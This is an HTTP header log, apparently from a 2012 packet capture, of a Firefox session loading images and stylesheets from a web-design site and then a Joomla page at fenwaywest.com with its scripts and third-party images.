Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:03 GMT
Etag: &quot;4bc9598-764-4c22f82f807aa&quot;
Accept-Ranges: bytes
Content-Length: 1892
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/inner.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:30 GMT
Etag: &quot;13113f8-775-4c22f849582e6&quot;
Accept-Ranges: bytes
Content-Length: 1909
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /images/x.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:10:22 GMT
Etag: &quot;4586d43-ce8-4c22f8ed6c444&quot;
Accept-Ranges: bytes
Content-Length: 3304
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /images/first.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:06 GMT
Etag: &quot;4bc959c-bac-4c22f83258b02&quot;
Accept-Ranges: bytes
Content-Length: 2988
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/secend.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:12 GMT
Etag: &quot;4d90536-ccb-4c22f8aa45b1f&quot;
Accept-Ranges: bytes
Content-Length: 3275
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /images/third.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:10:15 GMT
Etag: &quot;4586d3f-c98-4c22f8e728a52&quot;
Accept-Ranges: bytes
Content-Length: 3224
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /images/four.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:16 GMT
Etag: &quot;4bc95a5-c5a-4c22f83bb6731&quot;
Accept-Ranges: bytes
Content-Length: 3162
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /images/five.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:07 GMT
Etag: &quot;4bc959d-c6b-4c22f8338bcd5&quot;
Accept-Ranges: bytes
Content-Length: 3179
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /images/price.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:08 GMT
Etag: &quot;4bcc9d8-ce4-4c22f8a6a3d57&quot;
Accept-Ranges: bytes
Content-Length: 3300
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /images/p-p-sub-page.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:42 GMT
Etag: &quot;5ca3409-785-4c22f854eb53f&quot;
Accept-Ranges: bytes
Content-Length: 1925
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /images/save.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:10 GMT
Etag: &quot;4bcc9e0-955-4c22f8a926208&quot;
Accept-Ranges: bytes
Content-Length: 2389
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /images/select.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:14 GMT
Etag: &quot;4d90538-aca-4c22f8ac30dbb&quot;
Accept-Ranges: bytes
Content-Length: 2762
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /images/bg.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/style/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:06:54 GMT
Etag: &quot;55e75b3-2d0-4c22f8277ed36&quot;
Accept-Ranges: bytes
Content-Length: 720
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /images/m-h.gif HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/style/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:37 GMT
Etag: &quot;5ca3404-30-4c22f8504f029&quot;
Accept-Ranges: bytes
Content-Length: 48
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /images/ask.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:06:20 GMT
Etag: &quot;1c10417-3278-4c22f8065c15c&quot;
Accept-Ranges: bytes
Content-Length: 12920
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /images/pac-bot1.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/style/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:46 GMT
Etag: &quot;5ca340b-3149-4c22f8586a074&quot;
Accept-Ranges: bytes
Content-Length: 12617
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /images/ar.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/style/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:06:15 GMT
Etag: &quot;10ce0fe-19c-4c22f80192950&quot;
Accept-Ranges: bytes
Content-Length: 412
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /images/arrow.gif HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/style/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:06:17 GMT
Etag: &quot;1c10415-13f-4c22f80414dd2&quot;
Accept-Ranges: bytes
Content-Length: 319
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /images/footer-bg-1.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/style/style.css
Cookie: __utma=252187008.669848676.1353298652.1353298652.1353298652.1; __utmb=252187008.1.10.1353298652; __utmc=252187008; __utmz=252187008.1353298652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:09 GMT
Etag: &quot;4bc959f-18c-4c22f8352f6fa&quot;
Accept-Ranges: bytes
Content-Length: 396
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /images/footer-bg.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/style/style.css
Cookie: __utma=252187008.669848676.1353298652.1353298652.1353298652.1; __utmb=252187008.1.10.1353298652; __utmc=252187008; __utmz=252187008.1353298652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:11 GMT
Etag: &quot;4bc95a2-191-4c22f837b2338&quot;
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /images/footer-ar.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/style/style.css
Cookie: __utma=252187008.669848676.1353298652.1353298652.1353298652.1; __utmb=252187008.1.10.1353298652; __utmc=252187008; __utmz=252187008.1353298652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:08 GMT
Etag: &quot;4bc959e-1d3-4c22f83461a64&quot;
Accept-Ranges: bytes
Content-Length: 467
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /images/footer-style-bg.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/style/style.css
Cookie: __utma=252187008.669848676.1353298652.1353298652.1353298652.1; __utmb=252187008.1.10.1353298652; __utmc=252187008; __utmz=252187008.1353298652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:12 GMT
Etag: &quot;4bc95a3-6f7-4c22f8388a804&quot;
Accept-Ranges: bytes
Content-Length: 1783
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /images/arrow-left.gif HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
Cookie: __utma=252187008.669848676.1353298652.1353298652.1353298652.1; __utmb=252187008.1.10.1353298652; __utmc=252187008; __utmz=252187008.1353298652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:06:16 GMT
Etag: &quot;1c10404-673-4c22f80268ad0&quot;
Accept-Ranges: bytes
Content-Length: 1651
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /images/arrow-right.gif HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
Cookie: __utma=252187008.669848676.1353298652.1353298652.1353298652.1; __utmb=252187008.1.10.1353298652; __utmc=252187008; __utmz=252187008.1353298652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:06:16 GMT
Etag: &quot;1c10414-674-4c22f803407a2&quot;
Accept-Ranges: bytes
Content-Length: 1652
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /media/index.php HTTP/1.1

Host: fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot;
Etag: 95cda459a21698ac0d2eaaa4602c106c
Content-Encoding: gzip
X-Content-Encoded-By: Joomla! 2.5
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: e10b4ecd1c1cb1f76b4bf3d66b789f6e=f6ca567a8a3c2397ee76795512237894; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /profile_images/1313133785/fenwestlogo_normal.png HTTP/1.1

Host: a0.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
x-amz-id-2: vCxnfYPSDwMovZixe0hSRO8JRrGRSd21tNDdb19MFGIgo+5ekQEY8g91+BMoXZod
x-amz-request-id: 84CD0A6ACAF2ADB5
Last-Modified: Sat, 16 Apr 2011 03:19:54 GMT
Etag: &quot;37b03cd1dbc33c3e88030535bd0fbcc4&quot;
Accept-Ranges: bytes
Content-Length: 4646
Server: AmazonS3
X-CDN: AKAM, AKAM, AKAM, AKAM, AKAM
Cache-Control: max-age=30987274
Expires: Tue, 12 Nov 2013 19:52:08 GMT
Date: Mon, 19 Nov 2012 04:17:34 GMT
Connection: keep-alive
GET /media/system/js/caption.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 15 Jun 2012 14:01:48 GMT
Etag: &quot;ecd365-291-4c28341d7ab00&quot;
Accept-Ranges: bytes
Content-Length: 657
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /media/system/js/core.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 13 Sep 2012 12:09:02 GMT
Etag: &quot;ecd35c-12b0-4c9942c467380&quot;
Accept-Ranges: bytes
Content-Length: 4784
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /cmsimages/cheap-custom-signs-logo.png HTTP/1.1

Host: www.signsonthecheap.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Content-Length: 1870
Server: Microsoft-IIS/7.5
Access-Control-Allow-Origin: *
Date: Mon, 19 Nov 2012 03:02:13 GMT
Cache-Control: public, max-age=4800
Expires: Mon, 19 Nov 2012 04:22:13 GMT
X-Strangeloop: RCache
X-SL-RCache: Cached
GET /network/ybn_pixel/9859 HTTP/1.1

Host: network.yardbarker.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/1.0.15
Last-Modified: Sun, 18 Nov 2012 14:07:19 GMT
Content-Encoding: gzip
Expires: Mon, 19 Nov 2012 04:17:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 19 Nov 2012 04:17:35 GMT
Content-Length: 1216
Connection: keep-alive
Vary: Accept-Encoding
GET /plugins/editors/jckeditor/typography/typography.php HTTP/1.1

Host: fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: e10b4ecd1c1cb1f76b4bf3d66b789f6e=f6ca567a8a3c2397ee76795512237894
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Cache-Control: public
Expires: Tue, 20 Nov 2012 04:17:34 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /cache/widgetkit/widgetkit-fac83f8d.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 15 Nov 2012 17:26:35 GMT
Etag: &quot;f613d4-4c8c-4ce8bf3ecc8c0&quot;
Accept-Ranges: bytes
Content-Length: 19596
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/base.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
